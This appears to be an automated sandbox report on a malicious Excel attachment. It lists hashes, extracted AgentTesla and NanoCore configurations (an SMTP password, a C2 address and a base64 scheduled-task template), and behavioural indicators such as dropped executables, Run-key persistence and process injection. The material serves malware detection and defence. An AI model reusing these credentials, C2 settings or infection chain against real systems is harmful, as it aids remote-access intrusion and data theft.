Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
26-09-2021 19:19
Static task
static1
Behavioral task
behavioral1
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win10v20210408
General
-
Target
RFQ#903_260921_new_request_10012_products.xls
-
Size
38KB
-
MD5
03cf64f6dff8c1467a756d8c2e2fac16
-
SHA1
c124554906286cdaa48240a394777b1ef6c853fe
-
SHA256
17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
-
SHA512
4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.privateemail.com - Port:
587 - Username:
[email protected] - Password:
office12#
Extracted
nanocore
1.2.2.0
185.140.53.52:4488
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-07-08T12:51:02.136438436Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4488
-
default_group
EXPO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.52
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1800 612 cmd.exe EXCEL.EXE -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
expo.exeammero.exeInstallUtil.exepid process 1948 expo.exe 1728 ammero.exe 392 InstallUtil.exe -
Loads dropped DLL 3 IoCs
Processes:
ei.exeexpo.exepid process 680 ei.exe 1948 expo.exe 1948 expo.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/680-66-0x00000000006B0000-0x00000000006D1000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
reg.exeInstallUtil.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Subsystem = "C:\\Program Files (x86)\\UDP Subsystem\\udpss.exe" InstallUtil.exe -
Processes:
InstallUtil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
expo.exedescription pid process target process PID 1948 set thread context of 392 1948 expo.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
InstallUtil.exedescription ioc process File opened for modification C:\Program Files (x86)\UDP Subsystem\udpss.exe InstallUtil.exe File created C:\Program Files (x86)\UDP Subsystem\udpss.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1388 schtasks.exe 1556 schtasks.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 612 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exepid process 896 powershell.exe 680 ei.exe 680 ei.exe 680 ei.exe 680 ei.exe 680 ei.exe 1948 expo.exe 1948 expo.exe 1728 ammero.exe 1728 ammero.exe 392 InstallUtil.exe 392 InstallUtil.exe 392 InstallUtil.exe 392 InstallUtil.exe 392 InstallUtil.exe 392 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
InstallUtil.exepid process 392 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 896 powershell.exe Token: SeDebugPrivilege 680 ei.exe Token: SeDebugPrivilege 1948 expo.exe Token: SeDebugPrivilege 1728 ammero.exe Token: SeDebugPrivilege 392 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 612 EXCEL.EXE 612 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 612 EXCEL.EXE 612 EXCEL.EXE 612 EXCEL.EXE -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeei.execmd.exeexpo.exeInstallUtil.exedescription pid process target process PID 612 wrote to memory of 1800 612 EXCEL.EXE cmd.exe PID 612 wrote to memory of 1800 612 EXCEL.EXE cmd.exe PID 612 wrote to memory of 1800 612 EXCEL.EXE cmd.exe PID 612 wrote to memory of 1800 612 EXCEL.EXE cmd.exe PID 1800 wrote to memory of 896 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 896 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 896 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 896 1800 cmd.exe powershell.exe PID 896 wrote to memory of 680 896 powershell.exe ei.exe PID 896 wrote to memory of 680 896 powershell.exe ei.exe PID 896 wrote to memory of 680 896 powershell.exe ei.exe PID 896 wrote to memory of 680 896 powershell.exe ei.exe PID 680 wrote to memory of 1328 680 ei.exe cmd.exe PID 680 wrote to memory of 1328 680 ei.exe cmd.exe PID 680 wrote to memory of 1328 680 ei.exe cmd.exe PID 680 wrote to memory of 1328 680 ei.exe cmd.exe PID 1328 wrote to memory of 1976 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1976 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1976 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1976 1328 cmd.exe reg.exe PID 680 wrote to memory of 1948 680 ei.exe expo.exe PID 680 wrote to memory of 1948 680 ei.exe expo.exe PID 680 wrote to memory of 1948 680 ei.exe expo.exe PID 680 wrote to memory of 1948 680 ei.exe expo.exe PID 1948 wrote to memory of 1728 1948 expo.exe ammero.exe PID 1948 wrote to memory of 1728 1948 expo.exe ammero.exe PID 1948 wrote to memory of 1728 1948 expo.exe ammero.exe PID 1948 wrote to memory of 1728 1948 expo.exe ammero.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 1948 wrote to memory of 392 1948 expo.exe InstallUtil.exe PID 392 wrote to memory of 1388 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1388 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1388 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1388 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1556 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1556 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1556 392 InstallUtil.exe schtasks.exe PID 392 wrote to memory of 1556 392 InstallUtil.exe schtasks.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:612 -
